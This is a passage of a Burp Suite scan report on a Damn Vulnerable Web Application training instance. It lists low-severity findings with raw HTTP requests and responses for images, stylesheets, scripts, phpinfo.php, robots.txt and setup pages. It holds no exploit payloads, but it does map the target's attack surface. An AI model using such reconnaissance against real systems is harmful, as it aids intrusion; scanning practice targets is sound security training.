ETag: "281fb-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.................%j.X.f.K..ijV.Z..nz3.j....V..-j..V.Z.en.... n...&0..c.a..a..A}......s..9...y..(....h.j..99.d.....CNN6j...F.F...4.
...[SNIP]...
15.16. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/overview.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /docs/graphics/docker/overview.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 73209
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "11df9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.......&. .(....
..Z
j........K.....%.R*.&e.Vje.e..{.......,...l.9,.?f....6qy....s.=..g...9..9.... _..CCC...aT..FF.000.........=..
...[SNIP]...
15.17. https://pentest-ground.com:4280/dvwa/css/help.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/help.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/css/help.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Referer: https://pentest-ground.com:4280/vulnerabilities/view_help.php?id=brute&security=low&locale=en
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/css
Content-Length: 304
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "130-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
15.18. https://pentest-ground.com:4280/dvwa/css/login.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/login.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/css/login.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/css
Content-Length: 842
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "34a-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background: #fefffe;
font: 12px/15px Arial, Helvetica, sans-serif;
line-height: 20px;
color: #6b6b6b;
}
#wrapper {
text-align: center;
margin: 0 auto;
}
#content {
display
...[SNIP]...
15.19. https://pentest-ground.com:4280/dvwa/css/main.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/main.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/css
Content-Length: 4026
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "fba-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
margin: 0;
color: #2f2f2f;
font: 12px/15px Arial, Helvetica, sans-serif;
min-width: 981px;
height: 100%;
position: relative;
}
body.home {
background: #e7e7e7;
}
div.clear
...[SNIP]...
15.20. https://pentest-ground.com:4280/dvwa/css/source.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/source.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/css/source.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Referer: https://pentest-ground.com:4280/vulnerabilities/view_source.php?id=brute&security=low
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:07 GMT
Content-Type: text/css
Content-Length: 319
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13f-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
15.21. https://pentest-ground.com:4280/dvwa/images/lock.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/lock.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/images/lock.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=cc1aefef1476eee2f6c22b6683bf0c38; security=impossible
Referer: https://pentest-ground.com:4280/security.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:35 GMT
Content-Type: image/png
Content-Length: 761
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2f9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...............o.....IDATx.....kg.......A..m..l.....|....pm.6OO..........E...[W...4.M..}...P!........bf._......6...D...}PNgGK?P3;;3....X\..Nc....................AM..o.W...?.w.zvff...
...[SNIP]...
15.22. https://pentest-ground.com:4280/dvwa/images/login_logo.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/login_logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/images/login_logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: image/png
Content-Length: 9088
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2380-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR.......r...... ....#GIDATx....pd.....;...m..m..m...z<wl..d....._w.}........U......Z..*U....(.f...8..8..1.....W....$.D.D.f.._(J.H.J..u8.'.@r
=.0$..(...\.....<......X.m.. ..pX.DQ....`;
...[SNIP]...
15.23. https://pentest-ground.com:4280/dvwa/images/logo.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/images/logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: image/png
Content-Length: 5044
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13b4-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...i...<.....e..~...{IDATx......h....l..m...*.:.gMp.m...6f....[....d..k.....3..er....8.I..u..Z ..B.
..r..V.."../fEl...7.....m.
.XZ.q.V_..b>.O[....-WWlWKu\5....'.f.>....|v...t....m..KY
...[SNIP]...
15.24. https://pentest-ground.com:4280/dvwa/images/spanner.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/spanner.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/images/spanner.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=823c02c4926209a190f21de98c4aef51
Referer: https://pentest-ground.com:4280/setup.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:20 GMT
Content-Type: image/png
Content-Length: 464
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "1d0-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR..............A......IDATx...5.SQ.....:\...C.}.p:...<.uo..}.uw.eqw'>...m..s.x...w2.\Dt.f..=~....j].!Sn...|...L. g.....2?.r.(55..<aPQ.../^......FRU..^a._.JJJ...d...G..<7..;.l......i...
...[SNIP]...
15.25. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/add_event_listeners.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 593
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "251-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
// These functions need to be called after the content they reference
// has been added to the page otherwise they will fail.
function addEventListeners() {
var source_button = document.getElementBy
...[SNIP]...
15.26. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/dvwaPage.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /dvwa/js/dvwaPage.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 1030
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "406-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
/* Help popup */
function popUp(URL) {
day = new Date();
id = day.getTime();
window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,heig
...[SNIP]...
15.27. https://pentest-ground.com:4280/hackable/uploads/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/hackable/uploads/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /hackable/uploads/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c89a7d1e75ef5e86c9d7f0c35ff5c80c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 403 Forbidden
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:59 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Ap
...[SNIP]...
15.28. https://pentest-ground.com:4280/instructions.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/instructions.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /instructions.php?doc=PDF HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c75ac127e20686129d48c0244418acaf
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3169
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link
...[SNIP]...
15.29. https://pentest-ground.com:4280/login.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/login.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /login.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<l
...[SNIP]...
15.30. https://pentest-ground.com:4280/logout.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/logout.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /logout.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
15.31. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e00e28236ae59386587b3d8a65c24511
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 82847
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
15.32. https://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/robots.txt |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/plain
Content-Length: 25
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "19-60aa7c44ae30b"
Accept-Ranges: bytes
User-agent: *
Disallow: /
15.33. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=20f82cc3bfe2f59fa9f8dc5eaf0d9132
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=7878af9d1f476a29debc53d941ab743b
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
15.34. https://pentest-ground.com:4280/setup.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3e13af75256398bc637d5d0dd777847d
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 79
create_db=Create+%2F+Reset+Database&user_token=ea82f69bc052fad0104ed7120d273e2e
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php
15.35. https://pentest-ground.com:4280/vulnerabilities/brute/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
